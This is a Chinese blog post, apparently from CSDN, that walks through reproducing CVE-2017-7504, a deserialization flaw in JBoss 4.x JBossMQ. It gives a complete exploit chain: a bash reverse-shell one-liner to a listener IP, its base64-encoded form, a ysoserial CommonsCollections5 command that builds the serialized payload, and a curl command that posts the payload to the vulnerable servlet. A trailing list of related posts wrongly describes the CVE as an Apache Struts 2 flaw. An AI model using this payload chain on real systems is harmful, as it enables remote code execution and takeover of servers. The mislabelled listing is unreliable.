JBoss 4.x JBossMQ JMS 反序列化漏洞复现(CVE-2017-7504)

于 2023-09-11 13:41:54 发布
阅读量309 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wutiangui/article/details/132805003
版权

一、影响版本
Jboss AS 4.x及之前版本
二、搭建环境
在这里插入图片描述在这里插入图片描述

三、漏洞验证
访问/jbossmq-httpil/HTTPServerILServlet,出现以下页面代表存在漏洞
在这里插入图片描述

四、漏洞复现
1.nc开启监听
在这里插入图片描述

2.生成序列化数据
使用工具ysoserial.jar生成序列化数据
bash -i >& /dev/tcp/192.168.155.2/1111 0>&1
Base64编码后
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==
所以payload:
java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE1NS4yLzExMTEgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser
执行完该命令之后,会在本地桌面生成一个序列化的文件exp.ser,并利用cat查看其内容。
在这里插入图片描述

然后,将生成的exp复制到JavaDeserH2HC-master目录方便下一步利用
3.反弹shell
使用序列化数据反弹shell
curl http://192.168.25.128:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @exp.ser
在这里插入图片描述在这里插入图片描述

只为了拿0day
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网安漏洞系列:漏洞JBoss 4.x JBossMQ JMS 序列漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 134
漏洞JBoss 4.x JBossMQ JMS 序列漏洞CVE-2017-7504)
CVE-2017-7504漏洞
Foreverlove112的博客
10-01 594
CVE-2017-7504漏洞
Jboss CVE-2017-7504 (vulhub)
最新发布
MDSEC的博客
08-25 606
Red Hat Jboss AS 4.X及之前的版本中的JbossMQ过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在安全漏洞。远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。如果漏洞过程中有问题,可能是因为java版本问题。(1)尝试 创建 /tmp/123 文件夹。需要:ysoserial 序列工具。(2) 弹shell。微信公众号:猫蛋儿安全。
JBoss-4.x-JBossMQ-JMS-序列
bqnagus
10-02 480
JBoss-4.x-JBossMQ-JMS-序列
【vulhub】JBOSS 4.x 序列远程代码执行漏洞CVE-2017-7504)
qq_45300786的博客
04-14 879
0x00前言: 序列就是把对象转换成字节流,便于保存在内存、文件、数据库中;序列即逆过程,由字节流还原成对象。 Java中的ObjectOutputStream类的writeObject()方法可以实序列,ObjectInputStream类的readObject()方法用于序列。 问题的根源在于类ObjectInputStream在序列时,没有对生成的对象的类型做限制。 Apache Commons Collections 是一个扩展了Java标准库里的Collection结构的第三
JBossMQJMS 序列漏洞CVE-2017-7504)漏洞利用工具
07-23
JBossMQJMS 序列漏洞CVE-2017-7504)是针对企业级Java消息服务(JMS)提供商JBossMQ的一个严重安全问题。该漏洞源于应用程序未能正确处理序列的对象,使得攻击者可以通过精心构造的恶意输入触发任意代码...
CVE-2017-12149JBOSSas6.X序列(弹shell版)
08-08
【标题】"CVE-2017-12149 JBOSS AS 6.X 序列漏洞详解及弹shell技术" 【内容】 CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的序列过程。在Java中,...
Jboss Application Server序列命令执行漏洞利用工具(CVE-2017-12149)
07-23
在2017年,它被发存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个序列漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 序列是将已序列的对象...
Java序列漏洞利用工具.zip
04-10
标题"Java序列漏洞利用工具.zip"表明该压缩包内包含了针对Java序列漏洞的利用工具,特别提到了针对JBOSS和WebLogic两个流行的Java应用服务器。JBOSS和WebLogic都是企业级的应用服务器,广泛用于部署各种业务...
CVE-2017-7504 (JBOSS序列漏洞)漏洞
Jerry____的博客
12-16 1908
CVE-2017-7504 (JBOSS序列漏洞)漏洞 一:漏洞原理 JBoss AS 4.x及之前版本中,JbossMQ过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。 二:影响范围 JBoss AS 4.x及之前版本。 三:环境搭建 cd...
JBoss 4.x JBossMQ JMS 序列漏洞CVE-2017-7504)
W小哥
06-05 860
一、漏洞描述 JBoss <=4.x 二、漏洞原理 Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。 三、环境搭建 四、漏洞 访问目标网站 五、漏洞 ...
【Vulhub】CVE-2017-7504 JBOSS序列漏洞
看不尽的尘埃——博客
02-07 8975
环境 目标(Kali):http://192.168.0.11:8080/ 操作机(Paroot):192.168.0.131     过程 CVE-2017-12149和CVE-2017-7504都是序列漏洞,因此用的东西都是一样的,笔者这里使用上次CVE-2017-12149的时候的POC文件。 笔者还特别查了下两种区别: CVE-2017-7504 影响范围...
jboss序列漏洞(CVE-2017-7504)
WY92139010的博客
07-31 572
jboss序列漏洞(CVE-2017-7504) 一、漏洞描述 Jboss AS 4.x及之前版本中,JbossMQ过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。 二、漏洞环境搭建以及 1、使用docker搭建漏洞环境...
fastjson 序列 不包括转义字符_视频 | 从零开始weblogic的序列漏洞
weixin_40006133的博客
10-21 146
本文作者:TtssGkf(Ms08067实验室 SRSP TEAM小组成员)DEFCON GROUP 86021是受全球性黑客大会DEFCON授权的官方社区,8月21日举办的上海极客沙龙上,TtssGkf代表MS08067安全实验室分享了《从零开始weblogic的序列漏洞》。 Weblogic序列漏洞是一个经典的漏洞系列,根源在于Weblogic(及其他很多jav...
墨者JBoss 4.x JBossMQ JMS序列漏洞
m0_63283172的博客
03-16 209
墨者JBoss 4.x JBossMQ JMS序列漏洞
jboss漏洞CVE-2017-7504序列漏洞+CVE-2017-12149任意代码执行漏洞+JMXInvokerServlet-deserialization序列漏洞
serendipity1130的博客
08-31 944
CVE-2017-7504 Jboss AS 4.x及之前版本中,JbossMQ过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。 1.扫描开放了8080端口,访问8080端口: 2、利用工具选择一个Gadget:ExampleCommonsCollections1WithHashMap编译并生成序列数据: javac -cp .:common
jboss java序列命令执行漏洞_jboss序列漏洞(CVE-2017-7504)
weixin_42515313的博客
02-26 205
jboss序列漏洞(CVE-2017-7504)一、漏洞描述Jboss AS 4.x及之前版本中,JbossMQ过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在序列漏洞,远程攻击者可借助特制的序列数据利用该漏洞执行任意代码。二、漏洞环境搭建以及1、使用docker搭建漏洞环境及Docker-com...
cve-2017-7504漏洞
08-23
您好!对于CVE-2017-7504漏洞,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞属于未经授权的活动,可能违法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值